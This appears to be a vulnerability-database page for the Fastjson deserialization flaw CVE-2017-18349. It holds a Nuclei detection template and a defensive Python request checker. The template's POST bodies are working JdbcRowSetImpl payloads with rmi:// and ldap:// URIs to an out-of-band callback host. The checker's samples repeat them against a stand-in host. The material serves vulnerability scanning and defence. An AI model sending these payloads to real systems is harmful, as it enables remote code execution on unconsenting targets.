| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Improper Input Validation in Alibaba Fastjson | 29 May 2026 09:40 | – | githubexploit |
| CVE-2017-18349 | 23 Dec 2024 00:00 | – | circl |
| Pippo FastjsonEngine Fastjson Arbitrary Code Execution Vulnerability | 24 Oct 2018 00:00 | – | cnvd |
| CVE-2017-18349 | 23 Oct 2018 20:00 | – | cve |
| CVE-2017-18349 | 23 Oct 2018 20:00 | – | cvelist |
| EUVD-2026-1694 | 9 Jan 2026 06:43 | – | euvd |
| Improper Input Validation in alilibaba:fastjson | 24 Oct 2018 19:42 | – | github |
| Improper Input Validation | 23 Oct 2018 00:00 | – | gitlab |
| CVE-2017-18349 | 23 Oct 2018 20:29 | – | nvd |
| GHSA-XJRR-XV9M-4PW5 Improper Input Validation in alilibaba:fastjson | 24 Oct 2018 19:42 | – | osv |
```yaml
id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later, which includes security patches for this vulnerability. Disable autoType functionality by setting `fastjson.parser.autoTypeSupport=false`. Implement strict whitelist filtering for `@type` annotations, and validate and sanitize all JSON input. Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.3897
    epss-percentile: 0.98402
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev,vuln

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip
# digest: 490a0046304402202855c4107e1bcf4d0b8d558a83757aa90df1be0be2e9aff614e962f65f051ebc022077aa48f3e9aa9f1125d0cc7f59dbcf81cd44cbba15f4169f01eff7976dda9238:922c64590222798bb761d5b6d8e72950
```
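The remediation above calls for whitelist filtering of `@type` hints. As an added, defensive example (not part of the template or the Vulners page), this Python request-body check walks a JSON document at any nesting depth and flags an `@type` value outside a hypothetical allowlist, or a JNDI-style URI such as the `rmi://` / `ldap://` values the template places in `dataSourceName`; the allowlisted class name, the sample bodies and the `oob.example.test` host are constructed for illustration.

```python
import json
import re

# Constructed allowlist for a hypothetical service: the only classes it
# expects in an "@type" hint. Anything else is treated as an autoType probe.
ALLOWED_TYPES = {"com.example.app.dto.Order"}

# JNDI schemes that Fastjson gadgets such as JdbcRowSetImpl resolve from a
# setter; a string field starting with one of these is worth flagging.
JNDI_URI = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def find_autotype_findings(body: str):
    """Return a list of findings for a JSON request body, recursing into
    nested objects and arrays so wrappers like {"data": {...}} are covered."""
    try:
        doc = json.loads(body)
    except ValueError:
        return [{"path": "$", "issue": "not valid JSON"}]

    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            type_hint = node.get("@type")
            if isinstance(type_hint, str) and type_hint not in ALLOWED_TYPES:
                findings.append({"path": path, "issue": "unexpected @type", "value": type_hint})
            for key, val in node.items():
                if isinstance(val, str) and JNDI_URI.match(val):
                    findings.append({"path": f"{path}.{key}", "issue": "jndi uri", "value": val})
                walk(val, f"{path}.{key}")
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(doc, "$")
    return findings


def is_suspicious(body: str) -> bool:
    """True when the body should be rejected or logged before parsing."""
    return bool(find_autotype_findings(body))


# Constructed sample bodies: two of the shapes the template above sends, plus a benign one.
SAMPLES = {
    "top_level": '{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://oob.example.test/x", "autoCommit": true}',
    "nested_b": '{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://oob.example.test/x", "autoCommit": true}}',
    "benign": '{"@type": "com.example.app.dto.Order", "id": 42}',
}
```

Running the check before the body reaches `parseObject` gives a WAF or application-level log event with the JSON path of the offending hint, which is more actionable than the generic `set property error` the server returns.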